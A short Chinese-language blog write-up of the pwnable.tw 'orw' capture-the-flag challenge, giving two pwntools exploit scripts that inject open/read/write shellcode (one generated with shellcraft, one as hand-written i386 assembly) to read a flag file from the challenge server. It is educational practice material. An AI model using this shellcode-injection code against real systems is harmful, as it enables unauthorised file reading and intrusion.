feichai's Blog
0%

pwnable-orw

发表于 更新于 分类于
本文字数: 1.7k 阅读时长 ≈ 2 分钟

orw入门题

解法一:

我直接用shellcraft生成的shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

try:
    p = remote('chall.pwnable.tw', 10001)
except:
    p = process('./pwn')

context(arch="i386",os="linux",log_level="debug")
elf=ELF("/home/feichai/ctf_file/chal")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

addr = 0x0804A060
shellcode = shellcraft.open("/home/orw/flag")+shellcraft.read(3,addr,0x100)+shellcraft.write(1,addr,0x100)

def pwn():
    
    p.sendlineafter(b':',asm(shellcode))
    p.interactive() 

if __name__=='__main__':
    pwn()

解法二:

手搓汇编代码,这里我是直接复制大佬写的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

try:
    p = remote('chall.pwnable.tw', 10001)
except:
    p = process('./pwn')

context(arch="i386",os="linux",log_level="debug")
elf=ELF("/home/feichai/ctf_file/chal")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

shellcode='''
mov eax,0x5    
xor ecx,ecx
push ecx
push 0x67616c66 
push 0x2f2f2f77 
push 0x726f2f65 
push 0x6d6f682f
mov ebx,esp
xor ecx,ecx
xor edx,edx
int 0x80

mov eax,0x3     
mov ecx, ebx
mov ebx, 0x3
mov edx, 0x50
int 0x80

mov eax,0x4     
mov ebx,0x1
mov edx,0x50
int 0x80
'''

def pwn():
    
    p.sendlineafter('shellcode:', asm(shellcode))
    p.interactive() 

if __name__=='__main__':
    pwn()

-------------本文结束感谢您的阅读-------------

欢迎关注我的其它发布渠道